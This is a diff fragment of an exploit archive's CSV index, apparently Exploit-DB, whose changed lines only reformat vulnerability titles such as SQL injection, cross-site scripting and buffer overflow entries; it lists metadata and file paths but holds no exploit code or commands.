32577,platforms/asp/webapps/32577.txt,"Dizi Portali - 'film.asp' SQL Injection",2008-11-10,"Kaan KAMIS",asp,webapps,0 32578,platforms/windows/remote/32578.py,"Yosemite Backup 8.70 - 'DtbClsLogin()' Remote Buffer Overflow",2008-11-11,"Abdul-Aziz Hariri",windows,remote,0 32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0 @@ -29382,7 +29377,7 @@ id,file,description,date,author,platform,type,port 32605,platforms/php/webapps/32605.txt,"Venalsur Booking Centre 2.01 - Multiple Cross-Site Scripting Vulnerabilities",2008-11-29,Pouya_Server,php,webapps,0 32606,platforms/php/webapps/32606.txt,"Basic CMS - 'q' Parameter Cross-Site Scripting",2008-11-29,Pouya_Server,php,webapps,0 32607,platforms/php/webapps/32607.txt,"RakhiSoftware Shopping Cart - product.php Multiple Parameter XSS",2008-11-28,"Charalambous Glafkos",php,webapps,0 -32608,platforms/php/webapps/32608.txt,"RakhiSoftware Shopping Cart PHPSESSID Cookie Manipulation Path Disclosure",2008-11-28,"Charalambous Glafkos",php,webapps,0 +32608,platforms/php/webapps/32608.txt,"RakhiSoftware Shopping Cart - PHPSESSID Cookie Manipulation Path Disclosure",2008-11-28,"Charalambous Glafkos",php,webapps,0 32609,platforms/asp/webapps/32609.txt,"Pre Classified Listings 1.0 - 'detailad.asp' SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 32610,platforms/asp/webapps/32610.txt,"Pre Classified Listings 1.0 - 'signup.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32611,platforms/asp/webapps/32611.txt,"CodeToad ASP Shopping Cart Script - Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 @@ -29463,7 +29458,7 @@ id,file,description,date,author,platform,type,port 32687,platforms/asp/webapps/32687.txt,"Madrese-Portal - 'haber.asp' SQL Injection",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 32688,platforms/windows/dos/32688.py,"Winace 2.2 - Malformed Filename Remote Denial of Service",2008-12-29,cN4phux,windows,dos,0 32689,platforms/php/webapps/32689.txt,"NPDS < 08.06 - Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 -32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution",2008-12-29,"Paul Szabo",linux,remote,0 +32690,platforms/linux/remote/32690.txt,"xterm - DECRQSS Remote Command Execution",2008-12-29,"Paul Szabo",linux,remote,0 32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - (libaudiofile) 'msadpcm.c' WAV File Processing Buffer Overflow",2008-12-30,"Anton Khirnov",linux,remote,0 32692,platforms/hardware/dos/32692.txt,"Symbian S60 - Malformed SMS/Mms Remote Denial Of Service",2008-12-30,"Tobias Engel",hardware,dos,0 32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0 @@ -29526,7 +29521,7 @@ id,file,description,date,author,platform,type,port 32757,platforms/php/webapps/32757.txt,"ConPresso CMS 4.07 - Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",php,webapps,0 32758,platforms/asp/webapps/32758.txt,"Lootan - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps,0 32759,platforms/php/webapps/32759.txt,"OpenX 2.6.2 - 'MAX_type' Parameter Local File Inclusion",2009-01-26,"Sarid Harper",php,webapps,0 -32760,platforms/php/webapps/32760.txt,"NewsCMSLite Insecure Cookie Authentication Bypass",2009-01-24,FarhadKey,php,webapps,0 +32760,platforms/php/webapps/32760.txt,"NewsCMSLite - Insecure Cookie Authentication Bypass",2009-01-24,FarhadKey,php,webapps,0 32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial Of Service",2009-01-27,Lostmon,windows,dos,0 32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 - Username Enumeration Weakness",2009-01-27,"Marco Mella",multiple,remote,0 32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 @@ -29546,12 +29541,12 @@ id,file,description,date,author,platform,type,port 32778,platforms/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local,0 32779,platforms/php/webapps/32779.txt,"Ilch CMS 1.1 - 'HTTP_X_FORWARDED_FOR' SQL Injection",2009-02-06,Gizmore,php,webapps,0 32780,platforms/linux/remote/32780.py,"PyCrypto ARC2 Module - Buffer Overflow",2009-02-07,"Mike Wiacek",linux,remote,0 -32781,platforms/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",multiple,remote,0 +32781,platforms/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor - Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",multiple,remote,0 32782,platforms/php/webapps/32782.txt,"FotoWeb 6.0 - Login.fwx s Parameter XSS",2009-02-09,"Stelios Tigkas",php,webapps,0 32783,platforms/php/webapps/32783.txt,"FotoWeb 6.0 - Grid.fwx search Parameter XSS",2009-02-09,"Stelios Tigkas",php,webapps,0 -32784,platforms/php/webapps/32784.txt,"glFusion 1.1 Anonymous Comment 'username' Field HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0 +32784,platforms/php/webapps/32784.txt,"glFusion 1.1 - Anonymous Comment 'username' Field HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0 32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0 -33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router Admin Password CSRF",2014-04-30,"shyamkumar somana",hardware,webapps,80 +33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router - Admin Password CSRF",2014-04-30,"shyamkumar somana",hardware,webapps,80 33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - login.php goto Parameter XSS",2009-07-27,Moudi,php,webapps,0 32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface - Authenticated Arbitrary Command Execution",2014-04-10,Metasploit,unix,remote,443 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF",2014-04-10,"High-Tech Bridge SA",php,webapps,80 @@ -29559,7 +29554,7 @@ id,file,description,date,author,platform,type,port 32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80 32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017)",2014-04-10,Metasploit,windows,local,0 32794,platforms/php/remote/32794.rb,"Vtiger - Install Unauthenticated Remote Command Execution",2014-04-10,Metasploit,php,remote,80 -32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0 +32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server - Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0 32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet Directory Traversal",2009-02-10,"Terry Froy",linux,remote,0 32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 - 'Login.asp' Multiple SQL Injection",2009-02-10,"Francesco Bianchino",asp,webapps,0 32798,platforms/multiple/remote/32798.pl,"ProFTPD 1.3 - 'mod_sql' Username SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 @@ -29587,7 +29582,7 @@ id,file,description,date,author,platform,type,port 32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-16,Metasploit,windows,remote,0 32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos,0 -32825,platforms/linux/remote/32825.txt,"djbdns 1.05 Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0 +32825,platforms/linux/remote/32825.txt,"djbdns 1.05 - Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0 32826,platforms/windows/remote/32826.html,"iDefense COMRaider - ActiveX Control 'write()' Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",windows,remote,0 32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0 32827,platforms/php/webapps/32827.txt,"Afian - 'includer.php' Directory Traversal",2009-03-02,vnbrain.net,php,webapps,0 @@ -29623,7 +29618,7 @@ id,file,description,date,author,platform,type,port 32857,platforms/linux/dos/32857.txt,"MPlayer - Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0 32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Parameter Cross-Site Scripting",2009-03-17,syniack,java,webapps,0 32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0 -32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 Duplicate URI Request Denial of Service",2009-03-31,"SCS team",java,dos,0 +32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 - Duplicate URI Request Denial of Service",2009-03-31,"SCS team",java,dos,0 32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0 32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 - 'command.shtml' Cross-Site Scripting",2009-03-31,"SCS team",java,webapps,0 32863,platforms/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting",2009-05-20,"SCS team",java,webapps,0 @@ -29632,16 +29627,16 @@ id,file,description,date,author,platform,type,port 32866,platforms/ios/webapps/32866.txt,"PDF Album 1.7 iOS - File Include Web",2014-04-14,Vulnerability-Lab,ios,webapps,0 32867,platforms/php/webapps/32867.txt,"WordPress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 32868,platforms/php/webapps/32868.txt,"WordPress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 -32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console Command Injection",2014-04-14,Metasploit,linux,webapps,10080 +32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console - Command Injection",2014-04-14,Metasploit,linux,webapps,10080 32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'awstats.pl' Multiple Path Disclosure",2009-04-19,r0t,cgi,webapps,0 -32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0 +32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0 32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0 32873,platforms/php/webapps/32873.txt,"PHPCMS2008 - 'ask/search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0 32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0 32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0 32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0 32877,platforms/multiple/remote/32877.txt,"Xlight FTP Server 3.2 - 'user' SQL Injection",2009-03-19,fla,multiple,remote,0 -32878,platforms/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN Cross-Site Scripting",2009-03-31,"Bugs NotHugs",hardware,remote,0 +32878,platforms/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN - Cross-Site Scripting",2009-03-31,"Bugs NotHugs",hardware,remote,0 32879,platforms/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 - 'webdbm' Multiple Cross-Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",windows,remote,0 32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Parameter Cross-Site Scripting",2009-03-31,TEAMELITE,php,webapps,0 32881,platforms/windows/dos/32881.py,"QtWeb Browser 2.0 - Malformed HTML File Remote Denial of Service",2009-04-01,LiquidWorm,windows,dos,0 @@ -29684,7 +29679,7 @@ id,file,description,date,author,platform,type,port 32924,platforms/php/webapps/32924.txt,"razorCMS 0.3RC2 - Multiple Vulnerabilities",2009-04-16,"Jeremi Gosney",php,webapps,0 32925,platforms/multiple/remote/32925.txt,"NRPE 2.15 - Remote Command Execution",2014-04-18,"Dawid Golunski",multiple,remote,0 32926,platforms/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",linux,dos,0 -32927,platforms/java/webapps/32927.txt,"BlackBerry Enterprise Server 4.0/4.1 MDS Connection Service Cross-Site Scripting",2009-04-16,"Ken Millar",java,webapps,0 +32927,platforms/java/webapps/32927.txt,"BlackBerry Enterprise Server 4.0/4.1 - MDS Connection Service Cross-Site Scripting",2009-04-16,"Ken Millar",java,webapps,0 32928,platforms/php/webapps/32928.txt,"Malleo 1.2.3 - 'admin.php' Local File Inclusion",2009-04-17,Drosophila,php,webapps,0 32929,platforms/linux/remote/32929.txt,"Red Hat Stronghold Web Server 2.3 - Cross-Site Scripting",2009-04-20,"Xia Shing Zee",linux,remote,0 32930,platforms/php/webapps/32930.txt,"CMSimple 4.4/4.4.2 - Remote File Inclusion",2014-04-18,NoGe,php,webapps,80 @@ -29703,7 +29698,7 @@ id,file,description,date,author,platform,type,port 32943,platforms/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - CSRF",2014-04-20,"Rakesh S",hardware,webapps,0 32944,platforms/multiple/remote/32944.txt,"SAP cFolders - Cross-Site Scripting / HTML Injection",2009-04-21,"Digital Security Research Group",multiple,remote,0 32945,platforms/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",multiple,remote,0 -32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0 +32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0 32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0 32948,platforms/php/webapps/32948.txt,"New5starRating 1.0 - 'admin/control_panel_sample.php' SQL Injection",2009-04-22,zer0day,php,webapps,0 32949,platforms/multiple/dos/32949.txt,"Mani's Admin Plugin - Remote Denial Of Service",2009-04-22,M4rt1n,multiple,dos,0 @@ -29712,7 +29707,7 @@ id,file,description,date,author,platform,type,port 32952,platforms/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Parameter Remote Command Execution",2009-04-23,SirGod,php,webapps,0 32953,platforms/asp/webapps/32953.vbs,"PuterJam's Blog PJBlog3 3.0.6 - 'action.asp' SQL Injection",2009-04-24,anonymous,asp,webapps,0 32954,platforms/hardware/remote/32954.txt,"Linksys WVC54GCA 1.00R22/1.00R24 Wireless-G - 'adm/file.cgi' Multiple Directory Traversal Vulnerabilities",2009-04-23,pagvac,hardware,remote,0 -32955,platforms/hardware/remote/32955.js,"Linksys WVC54GCA 1.00R22/1.00R24 Wireless-G Multiple Cross-Site Scripting Vulnerabilities",2009-04-25,pagvac,hardware,remote,0 +32955,platforms/hardware/remote/32955.js,"Linksys WVC54GCA 1.00R22/1.00R24 Wireless-G - Multiple Cross-Site Scripting Vulnerabilities",2009-04-25,pagvac,hardware,remote,0 32956,platforms/windows/dos/32956.py,"RealNetworks RealPlayer Gold 10.0 MP3 - File Handling Remote Denial of Service",2009-04-27,"Abdul-Aziz Hariri",windows,dos,0 32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0 32958,platforms/php/webapps/32958.txt,"MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0 @@ -29759,21 +29754,21 @@ id,file,description,date,author,platform,type,port 33057,platforms/php/webapps/33057.txt,"Aardvark Topsites PHP 5.2 - 'index.php' Cross-Site Scripting",2009-05-26,anonymous,php,webapps,0 33000,platforms/php/webapps/33000.txt,"Cacti 0.8.7 - 'data_input.php' Cross-Site Scripting",2009-05-15,fgeek,php,webapps,0 33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site scripting / Remote Command Execution",2009-05-20,inking,php,webapps,0 -33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,php,webapps,0 +33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 - Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,php,webapps,0 33003,platforms/php/webapps/33003.txt,"WordPress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - (dompdf.php read param) Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443 -33007,platforms/multiple/remote/33007.txt,"Novell GroupWise 8.0 WebAccess Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0 +33007,platforms/multiple/remote/33007.txt,"Novell GroupWise 8.0 WebAccess - Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0 33008,platforms/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injection",2009-05-22,Securitylab.ir,php,webapps,0 33009,platforms/asp/webapps/33009.txt,"DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting",2009-05-22,"ben hawkes",asp,webapps,0 -33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 Log File Remote Format String",2009-05-26,lofi42,hardware,remote,0 +33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 - Log File Remote Format String",2009-05-26,lofi42,hardware,remote,0 33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 - 'main/tracking/userLog.php' SQL Injection",2009-05-27,"Gerendi Sandor Attila",php,webapps,0 33012,platforms/windows/local/33012.c,"Microsoft Windows 2000/XP/2003 - Desktop Wall Paper System Parameter Local Privilege Escalation",2009-02-02,Arkon,windows,local,0 33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 - 'updatecheck.php' Cross-Site Scripting",2009-05-15,"Gerendi Sandor Attila",php,webapps,0 33014,platforms/php/webapps/33014.txt,"Achievo 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0 33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service",2009-05-29,"Miklos Szeredi",linux,dos,0 -33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String",2009-05-29,"Patrick Webster",hardware,remote,0 +33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN - 'cgi-bin/welcome/VirtualOffice' Remote Format String",2009-05-29,"Patrick Webster",hardware,remote,0 33017,platforms/linux/dos/33017.txt,"Adobe Acrobat 9.1.3 - Stack Exhaustion Denial of Service",2009-05-29,"Saint Patrick",linux,dos,0 33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption Denial of Service",2014-04-25,LiquidWorm,windows,dos,0 33019,platforms/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management / Authentication Bypass",2014-04-25,"Jared Bird",multiple,webapps,0 @@ -29795,8 +29790,8 @@ id,file,description,date,author,platform,type,port 33036,platforms/linux/dos/33036.txt,"Git 1.6.3 - Parameter Processing Remote Denial Of Service",2009-05-05,"Shawn O. Pearce",linux,dos,0 33037,platforms/multiple/dos/33037.html,"Apple QuickTime 7.4.1 - NULL Pointer Dereference Denial of Service",2009-05-14,"Thierry Zoller",multiple,dos,0 33038,platforms/php/webapps/33038.txt,"Webmedia Explorer 5.0.9/5.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-15,intern0t,php,webapps,0 -33039,platforms/linux/remote/33039.txt,"Mozilla Firefox 3.0.10 and SeaMonkey 1.1.16 Address Bar URI Spoofing",2009-05-11,"Pavel Cvrcek",linux,remote,0 -33040,platforms/linux/dos/33040.txt,"GUPnP 0.12.7 Message Handling Denial Of Service",2009-05-03,"Zeeshan Ali",linux,dos,0 +33039,platforms/linux/remote/33039.txt,"Mozilla Firefox 3.0.10 / SeaMonkey 1.1.16 - Address Bar URI Spoofing",2009-05-11,"Pavel Cvrcek",linux,remote,0 +33040,platforms/linux/dos/33040.txt,"GUPnP 0.12.7 - Message Handling Denial Of Service",2009-05-03,"Zeeshan Ali",linux,dos,0 33041,platforms/linux/dos/33041.txt,"Irssi 0.8.13 - 'WALLOPS' Message Off By One Heap Memory Corruption",2009-05-15,nemo,linux,dos,0 33042,platforms/linux/dos/33042.txt,"Mozilla Firefox 3.0.10 - 'nsViewManager.cpp' Denial of Service",2009-05-11,"Bret McMillan",linux,dos,0 33043,platforms/linux/dos/33043.txt,"Linux Kernel 2.6.x - '/proc/iomem' Sparc64 Local Denial of Service",2009-05-03,"Mikulas Patocka",linux,dos,0 @@ -29833,7 +29828,7 @@ id,file,description,date,author,platform,type,port 33076,platforms/php/webapps/33076.txt,"WordPress iMember360 Plugin 3.8.012 < 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",php,webapps,80 33078,platforms/multiple/remote/33078.txt,"HP ProCurve Threat Management Services zl ST.1.0.090213 Module CRL Security Bypass",2009-06-13,anonymous,multiple,remote,0 33079,platforms/multiple/remote/33079.txt,"Oracle Weblogic Server 10.3 - 'console-help.portal' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 -33080,platforms/multiple/dos/33080.txt,"Oracle 11.1 Database Network Foundation Heap Memory Corruption",2009-06-14,"Dennis Yurichev",multiple,dos,0 +33080,platforms/multiple/dos/33080.txt,"Oracle 11.1 - Database Network Foundation Heap Memory Corruption",2009-06-14,"Dennis Yurichev",multiple,dos,0 33081,platforms/multiple/remote/33081.cpp,"Oracle 9i/10g Database - Remote Network Authentication",2009-06-14,"Dennis Yurichev",multiple,remote,0 33082,platforms/multiple/remote/33082.txt,"Oracle 10g Secure Enterprise Search - 'search_p_groups' Parameter Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 33083,platforms/multiple/dos/33083.txt,"Oracle 9i/10g Database - TNS Command Remote Denial of Service",2009-06-14,"Dennis Yurichev",multiple,dos,0 @@ -29847,10 +29842,10 @@ id,file,description,date,author,platform,type,port 33091,platforms/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80 33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0 33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow",2009-11-12,HACKATTACK,novell,remote,0 -33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 Information Disclosure",2009-11-06,"Daniel King",jsp,webapps,0 +33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 - Information Disclosure",2009-11-06,"Daniel King",jsp,webapps,0 33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0 33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,remote,0 -33579,platforms/multiple/dos/33579.txt,"Ingres Database 9.3 Heap Buffer Overflow",2010-01-29,"Evgeny Legerov",multiple,dos,0 +33579,platforms/multiple/dos/33579.txt,"Ingres Database 9.3 - Heap Buffer Overflow",2010-01-29,"Evgeny Legerov",multiple,dos,0 33580,platforms/hardware/remote/33580.txt,"Comtrend CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0 33095,platforms/windows/remote/33095.rb,"Adobe Flash Player - Type Confusion Remote Code Execution",2014-04-29,Metasploit,windows,remote,0 33096,platforms/multiple/dos/33096.txt,"Crysis 1.21/1.5 - HTTP/XML-RPC Service Access Violation Remote Denial of Service",2009-06-20,"Luigi Auriemma",multiple,dos,0 @@ -29859,7 +29854,7 @@ id,file,description,date,author,platform,type,port 33099,platforms/multiple/dos/33099.txt,"World in Conflict 1.0.1 - Typecheck Remote Denial of Service",2009-06-16,"Luigi Auriemma",multiple,dos,0 33100,platforms/multiple/dos/33100.txt,"S.T.A.L.K.E.R. Clear Sky 1.0010 - Remote Denial of Service",2009-06-22,"Luigi Auriemma",multiple,dos,0 33101,platforms/linux/dos/33101.txt,"Mozilla Firefox 3.0.11 and Thunderbird 2.0.9 - RDF File Handling Remote Memory Corruption",2009-06-21,"Christophe Charron",linux,dos,0 -33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 Web Mail URI Parsing HTML Injection",2009-06-23,"Andrea Purificato",php,webapps,0 +33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 - Web Mail URI Parsing HTML Injection",2009-06-23,"Andrea Purificato",php,webapps,0 33103,platforms/linux/remote/33103.html,"Mozilla Firefox 3.5.1 - Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0 33104,platforms/multiple/dos/33104.txt,"Star Wars Battlefront II 1.1 - Remote Denial of Service",2009-06-24,"Luigi Auriemma",multiple,dos,0 33105,platforms/multiple/dos/33105.txt,"TrackMania 2.11.11 - Multiple Remote Vulnerabilities",2009-06-27,"Luigi Auriemma",multiple,dos,0 @@ -29884,7 +29879,7 @@ id,file,description,date,author,platform,type,port 33124,platforms/multiple/remote/33124.txt,"Google Chrome 2.0.172 - 'chrome://history/' URI Cross-Site Scripting",2009-06-28,"Karn Ganeshen",multiple,remote,0 33125,platforms/php/webapps/33125.txt,"Joomla! Permis 1.0 ('com_groups') Component - 'id' Parameter SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0 -33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0 +33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0 40080,platforms/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80 40081,platforms/cgi/webapps/40081.py,"Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80 40082,platforms/php/webapps/40082.txt,"WordPress All in One SEO Pack Plugin 2.3.6.1 - Persistent XSS",2016-07-11,"David Vaartjes",php,webapps,80 @@ -29901,7 +29896,7 @@ id,file,description,date,author,platform,type,port 33142,platforms/multiple/remote/33142.rb,"Apache Struts - ClassLoader Manipulation Remote Code Execution",2014-05-02,Metasploit,multiple,remote,8080 33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)",2014-05-02,"Brandon Perry",hardware,remote,443 33144,platforms/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0 -33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0 +33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0 33146,platforms/php/webapps/33146.txt,"CS-Cart 